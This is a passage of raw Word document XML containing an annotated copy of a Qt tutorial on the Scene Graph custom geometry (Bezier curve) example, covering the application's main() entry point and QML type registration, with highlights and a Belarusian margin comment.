        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2138" w:anchor="vertexDataAsPoint2D" w:history="1">
        <w:r w:rsidRPr="00324544">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGGeometry::vertexDataAsPoint2D</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00324544">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Then we go through each segment and calculate its position and write that value to the vertex.</w:t>
      </w:r>
      <w:r w:rsidR="00324544">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00324544" w:rsidRPr="00324544">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Тут, відаць, заключана логіка крывой Безье.</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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> node</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a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In the end of the function, we </w:t>
      </w:r>
      <w:r w:rsidRPr="00527E5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>return the node so the scene graph can render it</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE08BB" w:rsidRPr="00AE08BB" w:rsidRDefault="00AE08BB" w:rsidP="00081348">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1804" w:name="application-entry-point"/>
      <w:bookmarkStart w:id="1805" w:name="_Toc483000921"/>
      <w:bookmarkStart w:id="1806" w:name="_Toc483003912"/>
      <w:bookmarkStart w:id="1807" w:name="_Toc483604264"/>
      <w:bookmarkStart w:id="1808" w:name="_Toc483605484"/>
      <w:bookmarkEnd w:id="1804"/>
      <w:r w:rsidRPr="00081348">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Application Entry-Point</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1805"/>
      <w:bookmarkEnd w:id="1806"/>
      <w:bookmarkEnd w:id="1807"/>
      <w:bookmarkEnd w:id="1808"/>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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> argc</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char</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argv</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QGuiApplication</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> app</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argc</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argv</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qmlRegisterType</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BezierCurve</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"CustomGeometry"</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1</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"BezierCurve"</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QQuickView</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> view</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE08BB" w:rsidRPr="00081348" w:rsidRDefault="00AE08BB" w:rsidP="00AE08BB">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081348">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00081348">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QSurfaceFormat</w:t>
      </w:r>
      <w:r w:rsidRPr="00081348">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> format </w:t>
      </w:r>
      <w:r w:rsidRPr="00081348">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00081348">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> view</w:t>
      </w:r>
      <w:r w:rsidRPr="00081348">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00081348">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>format</w:t>
      </w:r>
      <w:r w:rsidRPr="00081348">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE08BB" w:rsidRPr="00081348" w:rsidRDefault="00AE08BB" w:rsidP="00AE08BB">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081348">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    format</w:t>
      </w:r>
      <w:r w:rsidRPr="00081348">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00081348">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>setSamples</w:t>
      </w:r>
      <w:r w:rsidRPr="00081348">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00081348">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidRPr="00081348">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE08BB" w:rsidRPr="00081348" w:rsidRDefault="00AE08BB" w:rsidP="00AE08BB">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00081348">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    view</w:t>
      </w:r>
      <w:r w:rsidRPr="00081348">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00081348">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>setFormat</w:t>
      </w:r>
      <w:r w:rsidRPr="00081348">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00081348">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>format</w:t>
      </w:r>
      <w:r w:rsidRPr="00081348">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>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view</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setSource</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QUrl</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"qrc:///scenegraph/customgeometry/main.qml"</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view</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show</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app</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exec</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AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The application is a straightforward QML application, with a</w:t>
      </w:r>
      <w:r w:rsidR="00935106">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2139" w:history="1">
        <w:r w:rsidRPr="00AE08BB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QGuiApplication</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00935106">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and a</w:t>
      </w:r>
      <w:r w:rsidR="00935106">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2140" w:history="1">
        <w:r w:rsidRPr="00AE08BB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00935106">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">that we pass a .qml file. To make use of the BezierCurve item, we need </w:t>
      </w:r>
      <w:r w:rsidRPr="00935106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to register</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> it in the QML engine, using the</w:t>
      </w:r>
      <w:r w:rsidR="00935106">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2141" w:anchor="qmlRegisterType" w:history="1">
        <w:r w:rsidRPr="00AE08BB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qmlRegisterType</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() function. We give it the name BezierCurve and make it part of the</w:t>
      </w:r>
      <w:r w:rsidR="00935106">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CustomGeometry 1.0</w:t>
      </w:r>
      <w:r w:rsidR="00935106">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE08BB" w:rsidRPr="00935106" w:rsidRDefault="00AE08BB" w:rsidP="00AE08BB">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">As the bezier curve is drawn using </w:t>
      </w:r>
      <w:r w:rsidRPr="00935106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GL_LINE_STRIP</w:t>
